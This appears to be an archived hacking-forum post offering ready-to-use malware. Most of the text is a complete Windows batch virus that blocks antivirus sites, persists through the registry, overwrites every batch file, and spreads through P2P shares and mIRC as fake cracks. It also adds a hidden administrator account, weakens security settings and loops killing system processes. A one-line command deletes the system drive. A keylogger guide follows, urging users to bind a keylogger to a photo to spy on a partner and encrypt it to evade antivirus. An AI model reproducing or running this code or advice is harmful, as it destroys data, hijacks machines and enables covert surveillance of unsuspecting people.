%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The

Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d

"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d

"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "<html>" > %windir%\hax0r.html
%The Laughing Manc% "<head>" >> %windir%\hax0r.html
%The Laughing Manc% "<title>Virus</title>" >> %windir%\hax0r.html
%The Laughing Manc% "</head>" >> %windir%\hax0r.html
%The Laughing Manc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%The Laughing Manc% "<p align="center"><b><font face="Arial" size="7"

color="#FFFFFF"><blink>I thought what I'd do was pretend to be one of those deaf mutes... - The Laughing Man</blink></font></b></p>" >> %windir%\hax0r.html
%The Laughing Manc% "</body>" >> %windir%\hax0r.html
%The Laughing Manc% "</html>" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d

"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d

"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >

nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man[/spoiler]


Fun Pack

[spoil]
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


Deletes the system drive.


Keyloggers:

Sangederomin:


this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your slave. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers


Viruses:

I think all of you know what Viruses mean.
Download some Virus Tools on :
[ Register or Signin to view external links. ]
and search for more on
[ Register or Signin to view external links. ]
The password for all downloaded files are :
To0l-base

Restricted website access:

There are a lot of ways but here are some good ones:

[ Register or Signin to view external links. ]
This will go to any website you want

Start>run>ping [ Register or Signin to view external links. ]
Take the ip and paste it in the url of the browser there you have it:)


Administrator priviliges:

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.


Im an ADMIN its even Stated, If you read it...and so its my Content since its my site...
Jump to:
You are viewing our Forum Archives. To view or take place in current topics click here.